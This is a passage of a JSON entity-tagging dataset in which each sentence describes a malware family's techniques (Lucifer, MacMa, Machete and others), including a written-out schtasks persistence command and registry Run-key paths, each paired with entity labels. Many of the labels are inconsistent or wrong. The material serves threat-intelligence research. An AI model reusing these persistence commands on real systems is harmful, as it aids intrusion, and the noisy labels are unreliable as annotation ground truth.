"ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lucifer", "has", "attempted", "to", "brute", "force", "TCP", "ports", "135", "(RPC)", "and", "1433", "(MSSQL)", "with", "the", "default", "username", "or", "list", "of", "usernames", "and", "passwords." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lucifer", "can", "identify", "the", "process", "that", "owns", "remote", "connections." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lucifer", "can", "check", "for", "existing", "stratum", "cryptomining", "information", "in", "<code>HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\spreadCpuXmr", "–", "%stratum", "info%</code>." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Lucifer", "can", "persist", "by", "setting", "Registry", "key", "values", "<code>HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\QQMusic</code>", "and", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\QQMusic</code>." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "Lucifer", "can", "use", "system", "resources", "to", "mine", "cryptocurrency,", "dropping", "XMRig", "to", "mine", "Monero." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "I-Purp", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Lucifer", "can", "infect", "victims", "by", "brute", "forcing", "SMB." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Lucifer", "has", "established", "persistence", "by", "creating", "the", "following", "scheduled", "task", "<code>schtasks", "/create", "/sc", "minute", "/mo", "1", "/tn", "QQMusic", "^", "/tr", "C:Users\\%USERPROFILE%\\Downloads\\spread.exe", "/F</code>." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lucifer", "has", "used", "UPX", "packed", "binaries." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Lucifer", "can", "perform", "a", "decremental-xor", "encryption", "on", "the", "initial", "C2", "request", "before", "sending", "it", "over", "the", "wire." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lucifer", "can", "check", "for", "specific", "usernames,", "computer", "names,", "device", "drivers,", "DLL's,", "and", "virtual", "devices", "associated", "with", "sandboxed", "environments", "and", "can", "enter", "an", "infinite", "loop", "and", "stop", "itself", "if", "any", "are", "detected." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lucifer", "can", "collect", "the", "computer", "name,", "system", "architecture,", "default", "language,", "and", "processor", "frequency", "of", "a", "compromised", "host." ], "ner_tags": [ "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lucifer", "can", "collect", "the", "IP", "address", "of", "a", "compromised", "host." ], "ner_tags": [ "B-HackOrg", "O", "B-Purp", "O", "B-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lucifer", "can", "identify", "the", "IP", "and", "port", "numbers", "for", "all", "remote", "connections", "from", "the", "compromised", "host." ], "ner_tags": [ "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lucifer", "has", "the", "ability", "to", "identify", "the", "username", "on", "a", "compromised", "host." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lucifer", "can", "issue", "shell", "commands", "to", "download", "and", "execute", "additional", "payloads." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Lucifer", "can", "use", "WMI", "to", "log", "into", "remote", "machines", "for", "propagation." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O" ] }, { "tokens": [ "Lurid", "can", "compress", "data", "before", "sending", "it." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lurid", "performs", "XOR", "encryption." ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "MCMD", "has", "the", "ability", "to", "remove", "set", "Registry", "Keys,", "including", "those", "used", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MCMD", "has", "the", "ability", "to", "upload", "files", "from", "an", "infected", "device." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "MCMD", "can", "modify", "processes", "to", "prevent", "them", "from", "being", "visible", "on", "the", "desktop." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MCMD", "can", "upload", "additional", "files", "to", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "MCMD", "has", "been", "named", "Readme.txt", "to", "appear", "legitimate." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "MCMD", "can", "Base64", "encode", "output", "strings", "prior", "to", "sending", "to", "C2." ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MCMD", "can", "use", "Registry", "Run", "Keys", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "MCMD", "can", "use", "scheduled", "tasks", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "MCMD", "can", "use", "HTTPS", "in", "communication", "with", "C2", "web", "servers." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MCMD", "can", "launch", "a", "console", "process", "(cmd.exe)", "with", "redirected", "standard", "input", "and", "output." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MESSAGETAP", "has", "XOR-encrypted", "and", "stored", "contents", "of", "SMS", "messages", "that", "matched", "its", "target", "list." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MESSAGETAP", "checks", "two", "files,", "keyword_parm.txt", "and", "parm.txt,", "for", "instructions", "on", "how", "to", "target", "and", "save", "data", "parsed", "and", "extracted", "from", "SMS", "message", "data", "from", "the", "network", "traffic.", "If", "an", "SMS", "message", "contained", "either", "a", "phone", "number,", "IMSI", "number,", "or", "keyword", "that", "matched", "the", "predefined", "list,", "it", "is", "saved", "to", "a", "CSV", "file", "for", "later", "theft", "by", "the", "threat", "actor." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "checking", "for", "the", "existence", "of", "two", "files,", "keyword_parm.txt", "and", "parm.txt,", "MESSAGETAP", "XOR", "decodes", "and", "read", "the", "contents", "of", "the", "files." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Once", "loaded", "into", "memory,", "MESSAGETAP", "deletes", "the", "keyword_parm.txt", "and", "parm.txt", "configuration", "files", "from", "disk." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "MESSAGETAP", "checks", "for", "the", "existence", "of", "two", "configuration", "files", "(keyword_parm.txt", "and", "parm.txt)", "and", "attempts", "to", "read", "the", "files", "every", "30", "seconds." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MESSAGETAP", "stored", "targeted", "SMS", "messages", "that", "matched", "its", "target", "list", "in", "CSV", "files", "on", "the", "compromised", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MESSAGETAP", "uses", "the", "libpcap", "library", "to", "listen", "to", "all", "traffic", "and", "parses", "network", "protocols", "starting", "with", "Ethernet", "and", "IP", "layers.", "It", "continues", "parsing", "protocol", "layers", "including", "SCTP,", "SCCP,", "and", "TCAP", "and", "finally", "extracts", "SMS", "message", "data", "and", "routing", "metadata." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "After", "loading", "the", "keyword", "and", "phone", "data", "files,", "MESSAGETAP", "begins", "monitoring", "all", "network", "connections", "to", "and", "from", "the", "victim", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MURKYTOP", "has", "the", "capability", "to", "schedule", "remote", "AT", "jobs." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O" ] }, { "tokens": [ "MURKYTOP", "has", "the", "capability", "to", "delete", "local", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "MURKYTOP", "has", "the", "capability", "to", "retrieve", "information", "about", "users", "on", "remote", "hosts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MURKYTOP", "has", "the", "capability", "to", "scan", "for", "open", "ports", "on", "hosts", "in", "a", "connected", "network." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MURKYTOP", "has", "the", "capability", "to", "retrieve", "information", "about", "shares", "on", "remote", "hosts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MURKYTOP", "has", "the", "capability", "to", "retrieve", "information", "about", "groups." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "MURKYTOP", "has", "the", "capability", "to", "identify", "remote", "hosts", "on", "connected", "networks." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MURKYTOP", "has", "the", "capability", "to", "retrieve", "information", "about", "the", "OS." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "MURKYTOP", "uses", "the", "command-line", "interface." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "has", "the", "ability", "to", "record", "audio." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "MacMa", "can", "clear", "possible", "malware", "traces", "such", "as", "application", "logs." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "can", "collect", "then", "exfiltrate", "files", "from", "the", "compromised", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "decrypts", "a", "downloaded", "file", "using", "AES-128-EBC", "with", "a", "custom", "delta." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "has", "used", "TLS", "encryption", "to", "initialize", "a", "custom", "protocol", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "MacMa", "exfiltrates", "data", "from", "a", "supplied", "path", "over", "its", "C2", "channel." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "can", "delete", "itself", "from", "the", "compromised", "computer." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "can", "search", "for", "a", "specific", "file", "on", "the", "compromised", "computer", "and", "can", "enumerate", "files", "in", "Desktop,", "Downloads,", "and", "Documents", "folders." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "has", "removed", "the", "`com.apple.quarantineattribute`", "from", "the", "dropped", "file,", "`$TMPDIR/airportpaird`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "has", "downloaded", "additional", "files,", "including", "an", "exploit", "for", "used", "privilege", "escalation." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp" ] }, { "tokens": [ "MacMa", "can", "dump", "credentials", "from", "the", "macOS", "keychain." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "can", "use", "Core", "Graphics", "Event", "Taps", "to", "intercept", "user", "keystrokes", "from", "any", "text", "input", "field", "and", "saves", "them", "to", "text", "files.", "Text", "input", "fields", "include", "Spotlight,", "Finder,", "Safari,", "Mail,", "Messages,", "and", "other", "apps", "that", "have", "text", "fields", "for", "passwords." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "installs", "a", "`com.apple.softwareupdate.plist`", "file", "in", "the", "`/LaunchAgents`", "folder", "with", "the", "`RunAtLoad`", "value", "set", "to", "`true`.", "Upon", "user", "login,", "MacMa", "is", "executed", "from", "`/var/root/.local/softwareupdate`", "with", "root", "privileges.", "Some", "variations", "also", "include", "the", "`LimitLoadToSessionType`", "key", "with", "the", "value", "`Aqua`,", "ensuring", "the", "MacMa", "only", "runs", "when", "there", "is", "a", "logged", "in", "GUI", "user." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "has", "stored", "collected", "files", "locally", "before", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "has", "used", "macOS", "API", "functions", "to", "perform", "tasks." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "has", "used", "a", "custom", "JSON-based", "protocol", "for", "its", "C&C", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "has", "used", "TCP", "port", "5633", "for", "C2", "Communication." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "can", "enumerate", "running", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "can", "manage", "remote", "screen", "sessions." ], "ner_tags": [ "B-Idus", "O", "O", "I-OffAct", "I-OffAct", "O" ] }, { "tokens": [ "MacMa", "has", "used", "Apple’s", "Core", "Graphic", "APIs,", "such", "as", "`CGWindowListCreateImageFromArray`,", "to", "capture", "the", "user's", "screen", "and", "open", "windows." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "MacMa", "can", "collect", "information", "about", "a", "compromised", "computer,", "including:", "Hardware", "UUID,", "Mac", "serial", "number,", "macOS", "version,", "and", "disk", "sizes." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "can", "collect", "IP", "addresses", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "can", "collect", "the", "username", "from", "the", "compromised", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MacMa", "has", "the", "capability", "to", "create", "and", "modify", "file", "timestamps." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "MacMa", "can", "execute", "supplied", "shell", "commands", "and", "uses", "bash", "scripts", "to", "perform", "additional", "actions." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "MacSpy", "can", "record", "the", "sounds", "from", "microphones", "on", "a", "computer." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MacSpy", "can", "steal", "clipboard", "contents." ], "ner_tags": [ "B-Way", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "MacSpy", "deletes", "any", "temporary", "files", "it", "creates" ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MacSpy", "stores", "itself", "in", "<code>~/Library/.DS_Stores/</code>" ], "ner_tags": [ "B-Way", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "MacSpy", "captures", "keystrokes." ], "ner_tags": [ "B-Way", "I-Features", "B-HackOrg" ] }, { "tokens": [ "MacSpy", "persists", "via", "a", "Launch", "Agent." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "MacSpy", "uses", "Tor", "for", "command", "and", "control." ], "ner_tags": [ "B-Way", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "MacSpy", "can", "capture", "screenshots", "of", "the", "desktop", "over", "multiple", "monitors." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MacSpy", "uses", "HTTP", "for", "command", "and", "control." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "saves", "the", "window", "names." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "stores", "zipped", "files", "with", "profile", "data", "from", "installed", "web", "browsers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete's", "collected", "data", "is", "encrypted", "with", "AES", "before", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Machete", "has", "used", "TLS-encrypted", "FTP", "to", "exfiltrate", "data." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "captures", "audio", "from", "the", "computer’s", "microphone." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete’s", "collected", "files", "are", "exfiltrated", "automatically", "to", "remote", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "retrieves", "the", "user", "profile", "data", "(e.g.,", "browsers)", "from", "Chrome", "and", "Firefox", "browsers." ], "ner_tags": [ "B-Idus", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "hijacks", "the", "clipboard", "data", "by", "creating", "an", "overlapped", "window", "that", "listens", "to", "keyboard", "events." ], "ner_tags": [ "B-Idus", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "has", "used", "pyobfuscate,", "zlib", "compression,", "and", "base64", "encoding", "for", "obfuscation.", "Machete", "has", "also", "used", "some", "visual", "obfuscation", "techniques", "by", "naming", "variables", "as", "combinations", "of", "letters", "to", "hinder", "analysis." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Way", "B-Tool", "O", "B-Way", "B-Tool", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "collects", "stored", "credentials", "from", "several", "web", "browsers." ], "ner_tags": [ "B-Idus", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "searches", "the", "File", "system", "for", "files", "of", "interest." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "can", "find,", "encrypt,", "and", "upload", "files", "from", "fixed", "and", "removable", "drives." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete’s", "downloaded", "data", "is", "decrypted", "using", "AES." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Machete's", "collected", "data", "is", "exfiltrated", "over", "the", "same", "channel", "used", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "has", "a", "feature", "to", "copy", "files", "from", "every", "drive", "onto", "a", "removable", "drive", "in", "a", "hidden", "folder." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "has", "sent", "data", "over", "HTTP", "if", "FTP", "failed,", "and", "has", "also", "used", "a", "fallback", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Once", "a", "file", "is", "uploaded,", "Machete", "will", "delete", "it", "from", "the", "machine." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "uses", "FTP", "for", "Command", "&", "Control." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "produces", "file", "listings", "in", "order", "to", "search", "for", "files", "to", "be", "exfiltrated." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "has", "the", "capability", "to", "exfiltrate", "stolen", "data", "to", "a", "hidden", "folder", "on", "a", "removable", "drive." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "can", "download", "additional", "files", "for", "execution", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Features", "B-Way", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "logs", "keystrokes", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "stores", "files", "and", "logs", "in", "a", "folder", "on", "the", "local", "drive." ], "ner_tags": [ "B-Idus", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "renamed", "task", "names", "to", "masquerade", "as", "legitimate", "Google", "Chrome,", "Java,", "Dropbox,", "Adobe", "Reader", "and", "Python", "tasks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Org", "O", "B-Tool", "B-Way", "I-Tool", "I-Tool", "O", "B-Tool", "O" ] }, { "tokens": [ "Machete", "renamed", "payloads", "to", "masquerade", "as", "legitimate", "Google", "Chrome,", "Java,", "Dropbox,", "Adobe", "Reader", "and", "Python", "executables." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Org", "O", "B-Tool", "B-Way", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Machete", "detects", "the", "insertion", "of", "new", "devices", "by", "listening", "for", "the", "WM_DEVICECHANGE", "window", "message." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Machete", "has", "scanned", "and", "looked", "for", "cryptographic", "keys", "and", "certificate", "file", "extensions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "has", "a", "component", "to", "check", "for", "running", "processes", "to", "look", "for", "web", "browsers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Machete", "is", "written", "in", "Python", "and", "is", "used", "in", "conjunction", "with", "additional", "Python", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "used", "the", "startup", "folder", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "different", "components", "of", "Machete", "are", "executed", "by", "Windows", "Task", "Scheduler." ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "sends", "stolen", "data", "to", "the", "C2", "server", "every", "10", "minutes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "captures", "screenshots." ], "ner_tags": [ "B-Idus", "O", "O" ] }, { "tokens": [ "Machete", "has", "been", "packed", "with", "NSIS." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Machete", "has", "used", "base64", "encoding." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "has", "used", "AES", "to", "exfiltrate", "documents." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Machete", "collects", "the", "hostname", "of", "the", "target", "computer." ], "ner_tags": [ "B-Idus", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "collects", "the", "MAC", "address", "of", "the", "target", "computer", "and", "other", "network", "configuration", "information." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "uses", "the", "<code>netsh", "wlan", "show", "networks", "mode=bssid</code>", "and", "<code>netsh", "wlan", "show", "interfaces</code>", "commands", "to", "list", "all", "nearby", "WiFi", "networks", "and", "connected", "interfaces." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "takes", "photos", "from", "the", "computer’s", "web", "camera." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "uses", "HTTP", "for", "Command", "&", "Control." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "use", "`AdjustTokenPrivileges()`", "to", "elevate", "privileges." ], 